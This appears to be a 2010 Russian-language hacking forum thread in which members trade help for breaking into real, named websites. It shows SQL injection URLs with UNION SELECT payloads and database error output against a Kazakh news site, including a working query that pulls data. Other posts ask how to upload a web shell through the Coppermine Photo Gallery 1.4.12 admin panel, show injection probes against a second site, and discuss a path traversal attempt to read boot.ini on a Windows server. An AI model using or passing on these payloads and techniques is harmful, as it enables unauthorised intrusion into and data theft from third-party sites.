 |
|
23.10.2010, 19:16
|
|
Участник форума
Регистрация: 14.07.2008
Сообщений: 117
С нами:
9382468
Репутация:
104
|
|
Сообщение от Generalisimu
нашел уязвимость!но не могу правельно составить запрос!
http://www.activ.kz/ru/?l=news&o=display&page=&idx=345
Microsoft JET Database Engine error '80040e14'
Syntax error in string in query expression 'NEWS_ID=345';'.
/ru/_news.asp, line 260
http://www.activ.kz/ru/?l=news&o=display&page=&idx=345+union+select+1,2,3 ,4,5,6,7,8+from+news
http://www.activ.kz/ru/?l=news&o=display&page=&idx=-345+union+select+*+from+msysobjects+in+'.'
Microsoft JET Database Engine error '80004005'
The Microsoft Jet database engine cannot open the file 'c:\windows\system32\inetsrv'. It is already opened exclusively by another user, or you need permission to view its data.
/ru/_news.asp, line
Но вывести нечего не удаеться.
Поскажите, как правилбно составить запрос.
Запрос правильный.
Вот например выводится id новости.
Код:
http://www.activ.kz/ru/?l=news&o=display&page=&idx=345+union+select+1,2,3,4,NEWS_ID,6,7,8+from+news
Так как доступа нет к системным таблицам MS Access, подбирать таблицу и колонки придется в ручную.
Советую почитать Проведение SQL инъекций в Microsoft Access
|
|
|
24.10.2010, 12:00
|
|
Постоянный
Регистрация: 25.01.2009
Сообщений: 368
С нами:
9100556
Репутация:
912
|
|
как залить шелл через админку Coppermine Photo Gallery 1.4.12?
|
|
|
|
24.10.2010, 12:05
|
|
Участник форума
Регистрация: 17.04.2010
Сообщений: 221
С нами:
8456912
Репутация:
17
|
|
.:[melkiy]:., линк в ПМ.
|
|
|
|
24.10.2010, 15:14
|
|
Познающий
Регистрация: 05.10.2010
Сообщений: 48
С нами:
8211926
Репутация:
5
|
|
http://www.7not.net/?m=news&n='
http://www.7not.net/?n=-1'
Как здесь запрос составить подскажите.Пробовал и union+select и order+by и что-то ничего не выходит
|
|
|
|
25.10.2010, 21:13
|
|
Познающий
Регистрация: 15.09.2008
Сообщений: 54
С нами:
9290631
Репутация:
46
|
|
Сообщение от JohnnyBGoode
http://www.7not.net/?m=news&n='
http://www.7not.net/?n=-1'
Как здесь запрос составить подскажите.Пробовал и union+select и order+by и что-то ничего не выходит
Нет тут скули
|
|
|
|
26.10.2010, 00:32
|
|
Новичок
Регистрация: 24.10.2010
Сообщений: 3
С нами:
8184566
Репутация:
0
|
|
PHP код:
[COLOR="#000000"][COLOR="#0000BB"]$a[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]preg_replace[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'/\//'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]"b"[/COLOR][COLOR="#007700"]]);[/COLOR][/COLOR]
подскажите, тут можно как-нибудь выполнить произвольный код? |
|
|
|
26.10.2010, 01:35
|
|
Участник форума
Регистрация: 10.09.2009
Сообщений: 120
С нами:
8772211
Репутация:
56
|
|
Сообщение от povar
PHP код:
[COLOR="#000000"][COLOR="#0000BB"]$a[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]preg_replace[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'/\//'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]"b"[/COLOR][COLOR="#007700"]]);[/COLOR][/COLOR]
подскажите, тут можно как-нибудь выполнить произвольный код? Это равносильно тому, что написать:
$a = $_GET['a'];
тут есть выполнение произвольного кода?
Может переменная попадает в SQL запрос, или eval, или include, или просто выводится на страницу. Исходя из этого уже можно делать какие то выводы. А пока что, экстрасенсов тут нет.
Все, что можно сказать по этой строке, это то, что переменная 'a' равна переменной 'b', переданной методом GET с отфильтрованными слешами.
Либо выкладывай больше кода, либо выполнения произвольного кода здесь нет.
|
|
|
|
26.10.2010, 01:35
|
|
Познавший АНТИЧАТ
Регистрация: 27.08.2007
Сообщений: 1,107
С нами:
9846041
Репутация:
1177
|
|
Сообщение от povar
PHP код:
[COLOR="#000000"][COLOR="#0000BB"]$a[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]preg_replace[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'/\//'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]"b"[/COLOR][COLOR="#007700"]]);[/COLOR][/COLOR]
подскажите, тут можно как-нибудь выполнить произвольный код? А при чем тут выполнение кода? Тут, я так понимаю, режуться символы от LFI\RFI. Есть способы обхода данного фильтра, фильтр слишком глупый =\
UPD:Я что-то не понял фильтра, там вроде массив должен быть, но не как все сразу перечислены, такой фильтр не от чего не защищает
|
|
|
|
26.10.2010, 01:47
|
|
Новичок
Регистрация: 24.10.2010
Сообщений: 3
С нами:
8184566
Репутация:
0
|
|
Выдержка из этой статьи:
/thread56756.html
Сообщение от None
Достаточно известный способ выполнить команды там, где нельзя, но очень хочется =)
При использовании /e(~e) модификатора в регулярке - пхп код, содержащийся во втором аргументе, выполнится...
....
Однако, даже если модификатор /e отсутствует - мы при возможности можем внедрить его, обрубив регулярку NULL-байтом.
В моем случае так нельзя проделать? |
|
|
|
26.10.2010, 01:57
|
|
Новичок
Регистрация: 24.10.2010
Сообщений: 3
С нами:
8184566
Репутация:
0
|
|
дальше идет:
PHP код:
[COLOR="#000000"][COLOR="#0000BB"]$f[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]fopen[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"./[/COLOR][COLOR="#0000BB"]$a[/COLOR][COLOR="#DD0000"]"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]"r"[/COLOR][COLOR="#007700"]);
while([/COLOR][COLOR="#0000BB"]$r[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]fread[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$f[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]1024[/COLOR][COLOR="#007700"])) print[/COLOR][COLOR="#0000BB"]$r[/COLOR][COLOR="#007700"];[/COLOR][/COLOR]
все это крутится на винде, скорее всего хр.
т.к. / фильтруются, пробовал ..\..\..\..\..\..\..\boot.ini
но не выводит ничего. ошибки не выводятся, путей нет.
какие варианты дальнейших действий? |
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
![Аватар для .:[melkiy]:.](/avatars/avatar74910.jpg?2399883){kind=avatar}
Похожие темы
Линейный вид
